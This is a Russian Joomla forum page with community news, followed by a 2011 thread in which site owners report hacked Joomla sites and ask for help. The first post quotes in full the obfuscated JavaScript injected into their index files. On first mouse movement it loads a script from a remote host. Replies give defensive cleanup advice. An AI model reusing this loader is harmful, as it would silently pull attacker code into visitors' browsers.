Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 14 Ответов
  • 4279 Просмотров
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Взломали сайт, встроили вредоносный скрипт.
« : 02.06.2011, 11:37:07 »
Сегодня обнаружил что все три сайта которые были у меня на одном хостинге были взломаны.

Ошибка которую выдавали сайты была вот такая
Parse error: syntax error, unexpected '<' in /home/www/.../index.php on line 89

ВСЕ файлы index.* и некоторые другие были испорченны в данное время 02.06.2011 2:18 ! В конец файлов был дописан скрипт
Код
<script type="text/javascript">
var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();
</script>
Написал хостеру об этой проблеме, в ответ получил следующее
Цитировать
Данная проблема, вероятнее всего, возникла в виду того, что был произведен несанкционированный доступ к используемой Вами CMS (Joomla), ввиду чего через уязвимость данной CMS был внедрен вредоносный код вида:
В данной ситуации мы рекомендуем Вам восстановить сайты из резервных копий за дату, когда сайты еще работали
Из резервной копии восстановился и все заработало...

Помогите разобраться с этой проблемой. Что это вообще было?
Как в дальнейшем избежать данного взлома?
Что делал данный скрипт?
Записан
*

skai

  • Завсегдатай
  • 1198
  • 153 / 1
  • skaiseo
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #1 : 02.06.2011, 11:59:27 »
Что делает скрипт не знаю.
По поводу защиты ответ стандартный: - не сохраняй пароли ftp, проверь комп на вирусы.
Записан
Наполнение вашего сайта - 1т.р. стр. (текст, изображения, мета, перелинковка). Гарантия высокого ранжирования. SEO консультация в подарок.
----------------------------------------------------------------------------------------------
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #2 : 02.06.2011, 12:28:39 »
Цитата: grishin от 02.06.2011, 11:37:07
через уязвимость данной CMS был внедрен вредоносный код

Может и так. Проверьте свой ПК AVPTool. Смените пароли от ftp, не храните их в менеджерах паролей. Восстановите сайт из бекапа и проверьте бекап той же AVPTool. Обновите все на сайте.

Могли бы сайт показать.
« Последнее редактирование: 02.06.2011, 12:32:26 от wishlight »
Записан
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #3 : 02.06.2011, 12:44:21 »
wishlight обычный сайт...всё что было странного написал в первом посте...до того как создал тему из бекапа все восстановил..
Записан
*

mohax

  • Давно я тут
  • 901
  • 66 / 3
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #4 : 02.06.2011, 13:02:45 »
Поверить версии компонентов, самой Joomla. Если нужно - все обновить.
Записан
*

ploskopopik

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #5 : 03.06.2011, 10:23:20 »
У меня вчера случилась точно такая же проблема, один в один. Но дело в том, что у меня нет резервной копии, как я могу восстановить работоспособность сайта?удалила вредоносный код из index, он появился в другом файле. Видимо есть какой то вирус, который генерит этот код.Как его найти?Подскажите пожалуйста.
Записан
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #6 : 03.06.2011, 10:35:49 »
Удаляйте код их тех файлов которые показывает сайт...что бы сайт заработал я файлов 15 почистил по очереди...
Скачайте весь сайт себе на компьютер и пройдитесь поиском и заменой по всем файлам...наверное Total Commander справиться, сам не пробовал.
Где то видел скрипт, который запускаешь и он удаляет на сервере то что ты указываешь в нем...очень удобный..

Какая версия движка у вас?
Хостер не делает резервные копии?
Записан
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #7 : 03.06.2011, 10:36:58 »
Записан
*

ploskopopik

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #8 : 03.06.2011, 11:03:37 »
нет, хостер ответил мол смените пароль на ftp и ищите ищите, версия 1.5.22
Записан
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #9 : 03.06.2011, 11:09:42 »
Ну тогда поиск и замена вас спасет...ссылку на БЕСПЛАТНУЮ програмку я вам дал, правда она из под виндуса только работает..придётся весь сайт скачать...

Наверное сто раз слышали что нужно делать резервную копию периодически? ;)
Записан
*

ploskopopik

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #10 : 03.06.2011, 11:16:24 »
слыхать то конечно слышали, но как говорится пока не коснется думаешь нормально все, а вот когда припрет, то да. Мой косяк сама знаю, вот сижу и локти теперь кусаю))
Записан
*

ploskopopik

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #11 : 03.06.2011, 11:17:54 »
Спасибо за ссылочку, будем искать. Не прощаюсь))
Записан
*

grishin

  • Захожу иногда
  • 145
  • 0 / 0
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #12 : 03.06.2011, 14:54:47 »
Ну собственно ничего хорошего(( вчера вечером с одним из трех сайтов произошло повторное встраивание вредоносного скрипта....возникают вопросы:

Почему это произошло только с одним сайтом?
Что этот скрипт делает? и какие последствия.
Записан
*

mohax

  • Давно я тут
  • 901
  • 66 / 3
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #13 : 03.06.2011, 15:16:53 »
Цитата: grishin от 03.06.2011, 14:54:47
Ну собственно ничего хорошего(( вчера вечером с одним из трех сайтов произошло повторное встраивание вредоносного скрипта....возникают вопросы:

Почему это произошло только с одним сайтом?
Что этот скрипт делает? и какие последствия.
Какие работы были сделаны из тех, что советовались выше?
Записан
*

Gruz

  • Завсегдатай
  • 1275
  • 167 / 3
  • gruz@jabber.org | gruz.org.ua
Re: Взломали сайт, встроили вредоносный скрипт.
« Ответ #14 : 03.06.2011, 15:46:23 »
Я бы рекомендовал поставить копию инфицированного сайта на локалхост.
Поставить рядом чистую Joomla. установить все точно такие же расширения. Настраивать не нужно, только установить.
Потом на инфицированной папка за папкой удалять и заменять на чистые.
Исключения - папка с изображениями и шаблоном. Там надо посмотреть и руками поправить. Их удалять нельзя, конечно же.

Вирус может быть как в файлах Joomla, так и лежать где-то спец.файл для доступа, задние двери. Потом перезапись сверху чистыми файлами проблему не решит.
Записан
Життя має дві форми - горіння і гниття!
-
Со мной на "ты" - Вам лень развёрнуто формулировать вопрос? Нам лень отвечать. Правильный вопрос: - Версии J! и проблемного расширения? - Что хотел? - Что пробовал? - Что получилось и что не получилось? - Какие были ошибки?
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 3873 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

 Ответов: 110
Просмотров: 72392 		Последний ответ 30.08.2023, 12:53:33
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

 Ответов: 9
Просмотров: 2637 		Последний ответ 05.11.2021, 21:47:31
от wishlight
В файле index.php постоянно появляется вредоносный код

Автор Armal

 Ответов: 29
Просмотров: 4811 		Последний ответ 08.05.2021, 16:16:32
от gartes
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

 Ответов: 0
Просмотров: 1485 		Последний ответ 29.08.2020, 00:25:24
от cntrl